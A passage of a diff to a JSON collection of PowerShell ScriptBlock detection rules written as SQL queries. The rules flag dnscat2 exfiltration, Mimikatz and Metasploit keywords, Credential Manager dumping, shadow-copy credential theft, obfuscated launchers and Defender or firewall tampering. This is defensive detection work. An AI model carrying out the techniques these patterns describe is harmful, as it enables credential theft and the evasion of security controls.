Dnscat2 — DNS Exfiltration tool (unlikely)" + "Unknown" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter Bookmarks%' ESCAPE '\\' AND ScriptBlockText LIKE '% -ErrorAction SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Force%' ESCAPE '\\')" ], - "filename": "posh_ps_dnscat_execution.yml" + "filename": "posh_ps_get_childitem_bookmarks.yml" }, { - "title": "PowerShell Credential Prompt", - "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", - "status": "test", - "description": "Detects PowerShell calling a credential prompt", - "author": "John Lambert (idea), Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", + "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -6454,9 +6025,9 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "posh_ps_prompt_credentials.yml" + "filename": "posh_ps_invoke_obfuscation_var.yml" }, { "title": "Troubleshooting Pack Cmdlet Execution", @@ -6478,77 +6049,81 @@ "filename": "posh_ps_susp_follina_execution.yml" }, { - "title": "Suspicious GetTypeFromCLSID ShellExecute", - "id": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", - "status": "experimental", - "description": "Detects suspicious Powershell code that execute COM Objects", + "title": "Powershell Store File In Alternate Data Stream", + "id": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", + "status": "test", + "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%::GetTypeFromCLSID(%' ESCAPE '\\' AND ScriptBlockText LIKE '%.ShellExecute(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath \"$env:comspec\" %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ArgumentList %' ESCAPE '\\' AND ScriptBlockText LIKE '%>%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_gettypefromclsid.yml" + "filename": "posh_ps_store_file_in_alternate_data_stream.yml" }, { - "title": "Potential COM Objects Download Cradles Usage - PS Script", - "id": "3c7d1587-3b13-439f-9941-7d14313dbdfe", + "title": "Suspicious New-PSDrive to Admin Share", + "id": "1c563233-030e-4a07-af8c-ee0490a66d3a", "status": "experimental", - "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", + "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.", "author": "frack113", + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], "falsepositives": [ - "Legitimate use of the library" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (ScriptBlockText LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR ScriptBlockText LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR ScriptBlockText LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSDrive%' ESCAPE '\\' AND ScriptBlockText LIKE '%-psprovider %' ESCAPE '\\' AND ScriptBlockText LIKE '%filesystem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-root %' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND ScriptBlockText LIKE '%$%' ESCAPE '\\')" ], - "filename": "posh_ps_download_com_cradles.yml" + "filename": "posh_ps_susp_new_psdrive.yml" }, { - "title": "Malicious PowerShell Keywords", - "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", - "status": "test", - "description": "Detects keywords from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "title": "Disable Powershell Command History", + "id": "602f5669-6927-4688-84db-0d4b7afb2150", + "status": "experimental", + "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", + "author": "Ali Alwashali", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1070.003" ], "falsepositives": [ - "Unknown" + "Legitimate script that disables the command history" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" ], - "filename": "posh_ps_malicious_keywords.yml" + "filename": "posh_ps_disable_psreadline_command_history.yml" }, { - "title": "Manipulation of User Computer or Group Security Principals Across AD", - "id": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", - "status": "test", - "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", + "title": "Modify Group Policy Settings - ScriptBlockLogging", + "id": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", + "status": "experimental", + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1136.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484.001" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.DirectoryServices.AccountManagement%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (ScriptBlockText LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnableSmartScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" ], - "filename": "posh_ps_directoryservices_accountmanagement.yml" + "filename": "posh_ps_modify_group_policy_settings.yml" }, { "title": "WMIC Unquoted Services Path Lookup - PowerShell", @@ -6570,661 +6145,630 @@ "filename": "posh_ps_wmi_unquoted_service_search.yml" }, { - "title": "Powershell File and Directory Discovery", - "id": "d23f2ba5-9da0-4463-8908-8ee47f614bb9", + "title": "Get-ADUser Enumeration Using UserAccountControl Flags", + "id": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", "status": "test", - "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.\nAdversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors,\nincluding whether or not the adversary fully infects the target and/or attempts specific actions.\n", + "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", "author": "frack113", "tags": [ "attack.discovery", - "attack.t1083" + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\' AND ScriptBlockText LIKE '%useraccountcontrol%' ESCAPE '\\' AND ScriptBlockText LIKE '%-band%' ESCAPE '\\' AND ScriptBlockText LIKE '%4194304%' ESCAPE '\\')" ], - "filename": "posh_ps_file_and_directory_discovery.yml" + "filename": "posh_ps_as_rep_roasting.yml" }, { - "title": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock", - "id": "88f0884b-331d-403d-a3a1-b668cf035603", - "status": "test", - "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", - "author": "frack113", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", + "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR (ScriptBlockText LIKE '%get-aduser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-f %' ESCAPE '\\' AND ScriptBlockText LIKE '%-pr %' ESCAPE '\\' AND ScriptBlockText LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "posh_ps_susp_ad_group_reco.yml" + "filename": "posh_ps_invoke_obfuscation_clip.yml" }, { - "title": "Suspicious GPO Discovery With Get-GPO", - "id": "eb2fd349-ec67-4caa-9143-d79c7fb34441", - "status": "experimental", - "description": "Detect use of Get-GPO to get one GPO or all the GPOs in a domain.", + "title": "Suspicious Connection to Remote Account", + "id": "1883444f-084b-419b-ac62-e0d0c5b3693f", + "status": "test", + "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\nWithout knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism\n", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1615" + "attack.credential_access", + "attack.t1110.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-GPO%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.DirectoryServices.Protocols.LdapDirectoryIdentifier%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Net.NetworkCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.DirectoryServices.Protocols.LdapConnection%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_get_gpo.yml" + "filename": "posh_ps_susp_networkcredential.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", - "id": "22d80745-6f2c-46da-826b-77adaededd74", - "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious IO.FileStream", + "id": "70ad982f-67c8-40e0-a955-b920c2fa05cb", + "status": "test", + "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", + "author": "frack113", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1070.003" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%IO.FileStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\.\\\\\\*' ESCAPE '\\')" ], - "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" + "filename": "posh_ps_susp_iofilestream.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", - "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", + "title": "PowerShell Write-EventLog Usage", + "id": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.defense_evasion" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Write-EventLog%' ESCAPE '\\' AND ScriptBlockText LIKE '%-RawData %' ESCAPE '\\')" ], - "filename": "posh_ps_using_set_service_to_hide_services.yml" + "filename": "posh_ps_susp_write_eventlog.yml" }, { - "title": "Powershell Install a DLL in System Directory", - "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell", + "id": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", "status": "experimental", - "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1556.002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%rundll32.exe%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ScriptBlockText LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "posh_ps_copy_item_system_directory.yml" + "filename": "posh_ps_invoke_obfuscation_via_rundll.yml" }, { - "title": "Windows Firewall Profile Disabled", - "id": "488b44e7-3781-4a71-888d-c95abfacf44d", - "status": "experimental", - "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", - "author": "Austin Songer @austinsonger", + "title": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock", + "id": "88f0884b-331d-403d-a3a1-b668cf035603", + "status": "test", + "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Enabled %' ESCAPE '\\' AND ScriptBlockText LIKE '% False%' ESCAPE '\\' AND (ScriptBlockText LIKE '% -All %' ESCAPE '\\' OR ScriptBlockText LIKE '%Public%' ESCAPE '\\' OR ScriptBlockText LIKE '%Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Private%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR (ScriptBlockText LIKE '%get-aduser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-f %' ESCAPE '\\' AND ScriptBlockText LIKE '%-pr %' ESCAPE '\\' AND ScriptBlockText LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\')))" ], - "filename": "posh_ps_windows_firewall_profile_disabled.yml" + "filename": "posh_ps_susp_ad_group_reco.yml" }, { - "title": "Powershell Sensitive File Discovery", - "id": "7d416556-6502-45b2-9bad-9d2f05f38997", - "status": "experimental", - "description": "Detect adversaries enumerate sensitive files", + "title": "Create Volume Shadow Copy with Powershell", + "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "status": "test", + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.pass%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdbx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" ], - "filename": "posh_ps_sensitive_file_discovery.yml" + "filename": "posh_ps_create_volume_shadow_copy.yml" }, { - "title": "Dump Credentials from Windows Credential Manager With PowerShell", - "id": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", - "status": "test", - "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", - "author": "frack113", + "title": "Tamper Windows Defender - ScriptBlockLogging", + "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", + "status": "experimental", + "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", + "author": "frack113, elhoim, Tim Shelton (fps, alias support)", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-PasswordVaultCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CredManCreds%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Windows.Security.Credentials.PasswordVault%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.CSharp.CSharpCodeProvider%' ESCAPE '\\' AND ScriptBlockText LIKE '%[System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())%' ESCAPE '\\' AND ScriptBlockText LIKE '%Collections.ArrayList%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.CodeDom.Compiler.CompilerParameters%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" ], - 